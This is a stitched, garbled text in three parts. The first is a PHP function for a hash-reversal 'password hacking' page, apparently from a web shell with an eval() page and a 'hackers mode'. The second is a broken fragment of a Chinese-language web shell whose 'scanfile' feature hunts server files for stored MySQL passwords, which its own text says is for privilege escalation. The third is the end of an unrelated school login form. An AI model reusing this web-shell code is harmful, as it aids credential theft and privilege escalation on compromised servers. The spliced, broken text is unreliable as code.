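/**
 * Passwords "hacking" page: renders the hash lookup form and, on POST,
 * shows what getpassbyhash() returned for the submitted md5/sha1 hash.
 *
 * Request values are validated (algorithm allow-list, hex digest of the
 * matching length) before they are handed to getpassbyhash(), and every
 * request- or lookup-derived value written into the page is HTML-escaped.
 *
 * @return string HTML fragment for the page
 */
function action_pwd_hck()
{
    // Supported digest algorithm => length of its hex representation.
    $digest_lengths = array('md5' => 32, 'sha1' => 40);

    $output = '<h1>password lookup</h1>';
    if (!function_exists('fsockopen')) {
        $output .= '<p class="error">Seems like fsockopen function is disabled - without it we cant use this.</p>';
    }
    $output .= '<p>Enter md5/sha1 password hash and we try to "reverse" it to plaintext (You can generate password hashes on ' . html_encode_link('eval() page', self, array('eval' => 1)) . ' or ...)</p>';

    $result = '';
    if (!empty($_POST)) {
        // is_string() rejects array-valued fields (hash[]=...), which would
        // otherwise reach string functions and the markup below as arrays.
        $hash = (isset($_POST['hash']) && is_string($_POST['hash']))
            ? strtolower(trim($_POST['hash']))
            : '';
        // Only allow-listed algorithm names are kept; anything else falls
        // back to md5 so an arbitrary value is never reflected or forwarded.
        $type = (isset($_POST['type']) && is_string($_POST['type']) && isset($digest_lengths[$_POST['type']]))
            ? $_POST['type']
            : 'md5';
        $p = array('hash' => $hash, 'type' => $type);

        if (!hack) {
            $output .= '<p class="error">sorry, "hackers mode" is disabled</p>';
        } else {
            $not_found = '<p class="error">Password not found :/</p>';
            $pattern = '/^[0-9a-f]{' . $digest_lengths[$type] . '}$/D';

            if (preg_match($pattern, $hash) !== 1) {
                // Not a digest of the selected algorithm: do not pass it on.
                $result = $not_found;
            } else {
                // NOTE(review): getpassbyhash() is defined elsewhere; the
                // fsockopen check above suggests it performs a network
                // lookup, so its return value is treated as untrusted.
                $answer = getpassbyhash($hash, $type);
                $answer = is_scalar($answer) ? (string) $answer : '';

                // Verify with the algorithm the user selected (not always
                // md5) and compare strictly: a loose == treats two
                // "0e<digits>" digests as equal numbers.
                $digest = ($type === 'sha1') ? sha1($answer) : md5($answer);
                $result = ($digest === $hash)
                    ? '<p>Password is: <strong>' . htmlspecialchars($answer, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</strong></p>'
                    : $not_found;
            }
        }
    } else {
        // First visit: pre-fill the form with a sample md5 digest.
        $p = array('hash' => md5('pass'), 'type' => 'md5');
    }

    // NOTE(review): `self` is a constant defined elsewhere; if it is derived
    // from the request URL it should be escaped at its definition - confirm.
    $output .= '<form action="' . self . '" method="post">';
    $output .= html_hidden(array('pwd_hck' => 1));
    // The hash is echoed into an attribute value, so it must be escaped.
    $output .= '<p><input type="text" name="hash" size="42" value="' . htmlspecialchars($p['hash'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '"></p>';
    $output .= $result;
    $output .= html_radio('type', array('md5' => 'md5', 'sha1' => 'sha1'), $p['type']);
    $output .= ' <input type="submit" value="here we go">';
    $output .= '</form>';

    return $output;
}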
$bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method="POST" name="sform"><br>'); html_input("text", "path", root_dir, "路径名", "45"); html_input("checkbox", "pass", "", "使用目录遍历", "", true); html_input("text", "code", $_POST['code'], "<br><br>关键字", "40"); html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog"), 0, "onchange='return Fulll(options[selectedIndex].value)'"); html_n('<br><br>'); html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode"); html_input("submit", "passreturn", "搜索"); html_n('</td></tr></form>'); if (!empty($_POST['path'])) { html_n('<tr><td>找到文件:<br><br>'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool); } break; case "scanphp": html_n('<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method="POST"><br>'); html_input("text", "path", root_dir, "查找范围", "40");
</div> <div class="form-group"> <label class="sr-only" for="user_pwd">密码:</label> <div class="input-group"> <div class="input-group-addon"><label class="glyphicon glyphicon-lock" for="user_name"></label></div> <input class="form-control" placeholder="密码" type="password" id="user_pwd" name="user_pwd"/> </div> </div> <div class="form-group"> <label class="sr-only">类型</label> <div class="input-group"> <div class="input-group-addon">类型</div> <div class="form-control"> <?php echo html_radio(['student' => "学生", "teacher" => "教师", "admin" => "管理员"], "login_type", req()->post('login_type'), "student", "<label>", " </label>\n"); ?> </div> </div> </div> <div class="form-group text-right"> <button class="btn btn-default" type="submit">登陆</button> </div> </fieldset> </form> </div> </body> </html>